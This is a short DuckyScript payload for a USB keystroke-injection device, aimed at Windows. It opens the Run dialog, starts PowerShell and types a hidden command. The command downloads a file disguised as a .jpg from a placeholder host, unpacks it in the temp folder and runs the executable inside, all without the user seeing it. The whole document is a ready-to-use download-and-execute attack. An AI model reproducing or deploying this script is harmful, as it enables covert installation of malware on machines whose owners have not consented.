REM Author: hell0
REM Description: Downloads an .zip file from the URL, extract and runs it on the target pc.
REM Version: 1.0
REM Category: Execution
REM Target: All Windows
DELAY 500
GUI d
DELAY 500
GUI r
DELAY 500
STRING powershell.exe
ENTER
DELAY 2000
STRING Start-Process -FilePath "powershell" -ArgumentList "/c cd $Env:temp;Invoke-WebRequest -Uri 'https://yoursite.com/zipfile.jpg' -OutFile 'zipfile.zip'; Expand-Archive zipfile.zip; Start-Process -FilePath '.\zipfile\your_executable.exe'; exit" -WindowStyle Hidden; exit
ENTER
DELAY 500
GUI d
